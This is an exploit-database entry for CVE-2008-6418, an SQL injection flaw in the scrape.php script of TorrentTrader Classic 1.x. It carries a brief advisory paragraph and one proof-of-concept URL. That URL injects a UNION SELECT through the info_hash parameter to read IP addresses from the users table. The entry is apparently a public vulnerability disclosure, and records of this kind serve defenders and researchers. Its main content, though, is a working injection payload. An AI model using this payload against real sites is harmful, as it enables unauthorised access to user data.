TorrentTrader Classic 1.x - 'scrape.php' SQL Injection
Author: Charles Vaughn
type: webapps
platform: php
port:
date_added: 2008-05-31
date_updated: 2014-02-24
verified: 1
codes: CVE-2008-6418;OSVDB-45858
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/29451/info
TorrentTrader Classic is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/scrape.php?info_hash=%22union%20select%201,1,1,1,ip%20from%20users--%20%20%20